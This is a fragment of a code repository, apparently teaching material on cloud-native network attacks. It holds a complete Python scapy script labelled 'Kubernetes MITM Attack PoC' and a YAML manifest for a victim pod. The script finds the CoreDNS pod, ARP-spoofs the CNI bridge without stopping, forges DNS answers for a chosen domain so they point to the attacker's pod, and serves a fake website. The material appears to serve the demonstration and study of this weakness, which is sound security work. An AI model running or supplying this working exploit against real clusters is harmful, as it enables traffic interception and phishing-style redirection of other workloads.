    "content": "#!/usr/bin/python3\n# issues about scapy with Pycharm:\n# https://stackoverflow.com/questions/45691654/unresolved-reference-with-scapy\n\nimport sys\nimport time\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom multiprocessing import Process\nfrom scapy.layers.inet import IP, UDP, Ether, ICMP\nfrom scapy.layers.l2 import ARP\nfrom scapy.sendrecv import srp1, srp, send, sendp, sniff, sr1\nfrom scapy.layers.dns import DNS, DNSQR, DNSRR\n\n\nclass S(BaseHTTPRequestHandler):\n    def _set_response(self):\n        self.send_response(200)\n        self.send_header('Content-type', 'text/html')\n        self.end_headers()\n\n    def do_GET(self):\n        self._set_response()\n        self.wfile.write(\"F4ke Website\\n\".encode('utf-8'))\n\n\nclass DnsProxy:\n    \"\"\" Handles DNS request packets, will forward them to real kube-dns, except for targeted domains. \"\"\"\n\n    def __init__(self, upstream_server, local_server_mac, local_server_ip,\n                 self_mac, self_ip, fake_domain, interface):\n        self.upstream_server = upstream_server\n        self.local_server_mac = local_server_mac\n        self.local_server_ip = local_server_ip\n        self.mac = self_mac\n        self.ip = self_ip\n        self.fake_domain = fake_domain\n        self.interface = interface\n\n    @staticmethod\n    def generate_response(request, ip=None, nx=None):\n        return DNS(id=request[DNS].id,\n                   aa=1,  # authoritative\n                   qr=1,  # a response\n                   rd=request[DNS].rd,  # copy recursion\n                   qdcount=request[DNS].qdcount,  # copy question count\n                   qd=request[DNS].qd,  # copy question itself\n                   ancount=1 if not nx else 0,  # we provide a single answer\n                   an=DNSRR(\n            rrname=request[DNS].qd.qname,\n            type='A',\n            ttl=1,\n            rdata=ip) if not nx else None,\n            rcode=0 if not nx else 3\n    
    )\n\n    @staticmethod\n    def is_local_domain(domain):\n        for tld in (\".local.\", \".internal.\"):\n            if domain.decode('ascii').endswith(tld):\n                return True\n\n    def forward(self, req_pkt, verbose):\n        # first contacting local dns server\n        req_domain = req_pkt[DNSQR].qname\n        def parse_responses(p): return ', '.join(\n            [str(p[DNSRR][x].rdata) for x in range(p[DNS].ancount)])\n\n        # if local, get response from kube-dns\n        if self.is_local_domain(req_domain):\n            answer = sr1(IP(dst=self.local_server_ip) / UDP() / DNS(rd=0,\n                                                                    id=req_pkt[DNS].id,\n                                                                    qd=DNSQR(qname=req_domain)),\n                         verbose=verbose,\n                         timeout=1)\n            resp_pkt = Ether(\n                src=self.local_server_mac) / IP(\n                dst=req_pkt[IP].src,\n                src=self.local_server_ip) / UDP(\n                sport=53,\n                dport=req_pkt[UDP].sport) / DNS()\n            # if timeout, returning NXDOMAIN\n            if answer:\n                resp_pkt[DNS] = answer[DNS]\n            else:\n                resp_pkt[DNS] = self.generate_response(req_pkt, nx=True)\n            sendp(resp_pkt, verbose=verbose)\n            print(\"[+] {} <- KUBE-DNS response {} - {}\".format(resp_pkt[IP].dst, str(req_domain),\n                                                               parse_responses(resp_pkt) if resp_pkt[DNS].rcode == 0\n                                                               else resp_pkt[DNS].rcode))\n        # else, get with upstream\n        else:\n            answer = sr1(IP(dst=self.upstream_server) / UDP() /\n                         DNS(rd=1, qd=DNSQR(qname=req_domain)), verbose=verbose)\n            resp_pkt = Ether(\n                src=self.local_server_mac) / IP(\n                
dst=req_pkt[IP].src,\n                src=self.local_server_ip) / UDP(\n                sport=53,\n                dport=req_pkt[UDP].sport) / DNS()\n            resp_pkt[DNS] = answer[DNS]\n            resp_pkt[DNS].id = req_pkt[DNS].id\n            sendp(resp_pkt, verbose=verbose)\n            print(\"[+] {} <- UPSTREAM response {} - {}\".format(resp_pkt[IP].dst, str(req_domain),\n                                                               parse_responses(resp_pkt) if resp_pkt[DNS].rcode == 0\n                                                               else resp_pkt[DNS].rcode))\n\n    def spoof(self, req_pkt):\n        spf_resp = IP(dst=req_pkt[IP].src,\n                      src=self.local_server_ip) / UDP(dport=req_pkt[UDP].sport,\n                                                      sport=53) / self.generate_response(req_pkt,\n                                                                                         ip=self.ip)\n\n        send(spf_resp, verbose=0, iface=self.interface)\n        print(\"[+] Spoofed response to: {} | {} is at {}\".format(spf_resp[IP].dst,\n                                                                 str(req_pkt[\"DNS Question Record\"].qname), self.ip))\n\n    def handle_queries(self, req_pkt):\n        \"\"\" decides whether to spoof or forward the packet \"\"\"\n        if req_pkt[\"DNS Question Record\"].qname.startswith(self.fake_domain.encode(\n                'utf-8')):\n            self.spoof(req_pkt)\n        else:\n            self.forward(req_pkt, verbose=False)\n\n    def dns_req_filter(self, pkt):\n        return (UDP in pkt and\n                DNS in pkt and\n                pkt[DNS].opcode == 0 and\n                pkt[DNS].ancount == 0 and\n                pkt[UDP].dport == 53 and\n                pkt[Ether].dst == self.mac and\n                pkt[IP].dst == self.local_server_ip)\n\n    def start(self):\n        # sniffing and filtering dns queries sent to self\n        sniff(\n            
lfilter=self.dns_req_filter,\n            prn=self.handle_queries,\n            iface=self.interface,\n            store=False)\n\n\ndef get_self_mac_ip():\n    return Ether().src, ARP().psrc\n\n\ndef get_kube_dns_svc_ip():\n    # Parse /etc/resolv.conf for the first nameserver entry (the kube-dns service IP),\n    # instead of assuming it is always on the first line\n    with open('/etc/resolv.conf', 'r') as f:\n        for line in f:\n            if line.startswith('nameserver'):\n                return line.strip().split()[1]\n\n\ndef get_coredns_pod_mac_ip(kube_dns_svc_ip, self_ip, verbose):\n    mac = srp1(Ether() / IP(dst=kube_dns_svc_ip) /\n               UDP(dport=53) / DNS(rd=1, qd=DNSQR()), verbose=verbose).src\n    answers, _ = srp(Ether(dst=\"ff:ff:ff:ff:ff:ff\") /\n                     ARP(pdst=\"{}/24\".format(self_ip)), timeout=4, verbose=verbose)\n    for answer in answers:\n        if answer[1].src == mac:\n            return mac, answer[1][ARP].psrc\n\n    return None, None\n\n\ndef get_bridge_mac_ip(verbose):\n    res = srp1(Ether() / IP(dst=\"8.8.8.8\", ttl=1) / ICMP(), verbose=verbose)\n    return res[Ether].src, res[IP].src\n\n\ndef arp_spoofing(bridge_ip, coredns_pod_ip,\n                 bridge_mac, verbose):\n    while True:\n        send(ARP(op=2,\n                 pdst=bridge_ip,\n                 psrc=coredns_pod_ip,\n                 hwdst=bridge_mac),\n             verbose=verbose)\n\n\ndef fake_http_server():\n    server_address = ('', 80)\n    server = HTTPServer(server_address, S)\n    server.serve_forever()\n\n\ndef main(verbose):\n    print(\"Kubernetes MITM Attack PoC\")\n\n    print(\"[*] Starting HTTP Server at 80...\")\n    p1 = Process(target=fake_http_server)\n    p1.start()\n\n    self_mac, self_ip = get_self_mac_ip()\n    print(\"[+] Current pod IP: %s, MAC: %s\" % (self_ip, self_mac))\n    kube_dns_svc_ip = get_kube_dns_svc_ip()\n    print(\"[+] Kubernetes DNS service IP: %s\" % kube_dns_svc_ip)\n    coredns_pod_mac, coredns_pod_ip = get_coredns_pod_mac_ip(\n        kube_dns_svc_ip, self_ip, verbose=verbose)\n    print(\"[+] CoreDNS pod IP: %s, MAC: %s\" %\n          (coredns_pod_ip, coredns_pod_mac))\n    bridge_mac, bridge_ip = get_bridge_mac_ip(verbose=verbose)\n    print(\"[+] CNI bridge IP: %s, MAC: %s\" % (bridge_ip, bridge_mac))\n\n    print(\"[*] Starting ARP spoofing...\")\n    p2 = Process(\n        target=arp_spoofing,\n        args=(\n            bridge_ip,\n            coredns_pod_ip,\n            bridge_mac,\n            verbose))\n    p2.start()\n\n    print(\"[*] Starting DNS proxy...\")\n    # proxy dns query and response\n    dns_proxy = DnsProxy(\n        upstream_server=\"8.8.8.8\",\n        local_server_mac=coredns_pod_mac,\n        local_server_ip=coredns_pod_ip,\n        self_mac=self_mac,\n        self_ip=self_ip,\n        fake_domain=sys.argv[1],\n        interface='eth0')\n    p3 = Process(target=dns_proxy.start)\n    p3.start()\n\n    while True:\n        time.sleep(1)\n\n\ndef usage():\n    print(\n        \"Usage:\\n\\tpython3 {} target_domain\".format(\n            sys.argv[0]))\n\n\nif __name__ == \"__main__\":\n    if len(sys.argv) != 2:\n        usage()\n    else:\n        main(verbose=False)\n"
  },
  {
    "path": "code/0405-云原生网络攻击/victim.yaml",
    "content": "# victim pod\napiVersion: v1\nkind: Pod\nmetadata:\n  name: victim\nspec:\n  containers:\n  - name: main\n    image: curlimages/curl:latest\n    imagePullPolicy: IfNotPresent\n    # Just spin & wait forever\n    command: [ \"/bin/sh\", \"-c\", \"--\" ]\n    args: [ \"while true; do sleep 30; done;\" ]"
  }
]